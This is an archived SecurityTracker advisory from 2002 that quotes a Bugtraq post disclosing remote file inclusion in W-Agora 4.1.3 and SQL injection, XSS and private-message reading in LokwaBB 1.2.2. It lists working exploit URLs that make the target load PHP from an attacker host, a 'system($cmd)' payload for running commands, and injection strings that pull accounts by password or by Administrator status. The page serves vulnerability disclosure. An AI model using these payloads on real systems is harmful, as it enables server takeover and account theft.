SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   W-Agora Vendors:   Druilhe, Marc
W-Agora Web Forum Software Lets Remote Users Execute Arbitrary PHP Code on the Server
SecurityTracker Alert ID:  1004494
SecurityTracker URL:  http://securitytracker.com/id/1004494
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 9 2002
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 4.1.3
Description:   Several related vulnerabilities have been reported in the W-Agora web forum software. A remote user can write malicious PHP code and cause it to be executed on the server.

It is reported that several components of W-Agora feature an include definition statement that allows a remote user to specify that the include file reside on a remote server. So, a remote user can place a malicious PHP file on a remote server, then call one of the affected components to cause the remote, malicious PHP code to be executed on the target web server.

Some demonstration exploit URLs are provided below.

Using a remote PHP file at http://[maliciousserver]/dbaccess.txt:

http://[target]/include/oci8.php?inc_dir=http://[maliciousserver]&ext=txt
http://[target]/include/postgres65.php?inc_dir=http://[maliciousserver]&ext=txt
http://[target]/include/mysql.php?inc_dir=http://[maliciousserver]&ext=txt
http://[target]/include/mssql7.php?inc_dir=http://[maliciousserver]&ext=txt
http://[target]/include/msql.php?inc_dir=http://[maliciousserver]&ext=txt

Using a remote PHP file at http://[maliciousserver]/postgres65.txt:

http://[target]/include/postgres.php?inc_dir=http://[maliciousserver]&ext=txt

Using a remote PHP file at http://[maliciousserver]/auth.txt:

http://[target]/user/agora_user.php?inc_dir=http://[maliciousserver]&ext=txt
http://[target]/user/ldap_example.php?inc_dir=http://[maliciousserver]&ext=txt

For these exploits to work, the remote malicious file must include the following type of content:

<? system($cmd); >

Then, the URL should include '&cmd=[COMMAND]' to cause the 'COMMAND' to be executed by the target server.

The original advisory (in French language) is available at:

http://www.ifrance.com/kitetoua/tuto/W-Agora.txt

Impact:   A remote user can execute arbitrary PHP code (including system commands) on the target server. The code will run with the privileges that the web server assigns for PHP code.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.w-agora.net/en/index.php (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  Security holes in LokwaBB and W-Agora


Somebody advised me to post also on bugtraq not only on vuln-dev, I thus do 
it :)  I just hope that doesn't give more work to the webmasters.

Product 1 :
***********
W-Agora 4.1.3
http://www.w-agora.net

Problem :
- Including file

Exploits :
- With a file http://www.attacker.com/dbaccess.txt :
http://[target]/include/oci8.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/postgres65.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/mysql.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/mssql7.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/msql.php?inc_dir=http://www.attacker.com&ext=txt

- With a file http://www.attacker.com/postgres65.txt :
http://[target]/include/postgres.php?inc_dir=http://www.attacker.com&ext=txt

- With the file http://www.attacker.com/auth.txt :
http://[target]/user/agora_user.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/user/ldap_example.php?inc_dir=http://www.attacker.com&ext=txt

More details in french :
http://www.ifrance.com/kitetoua/tuto/W-Agora.txt

Translated by Goolge :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FW-Agora.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools

Product 2 :
***********
LokwaBB 1.2.2
http://lokwa.farcom.com/

Problems :
- XSS
- Privates messages reading
- SQL Injection

Exploits :
- 
http://[target]/member.php?action=viewpro&member='%20OR%20password='PASSWORD
- 
http://[target]/member.php?action=viewpro&member='%20OR%20status='Administrator
- misc.php?action=forgot&send=yes&loser='%20OR%20password='PASSWORD
- http://[target]/pm.php?action=reply&pmid=[MESSAGE ID]

More details in french :
http://www.ifrance.com/kitetoua/tuto/LokwaBB.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FLokwaBB.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools



Sorry for my poor english :)
frog-m@n



_________________________________________________________________
http://explorer.msn.fr/intl.asp.

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC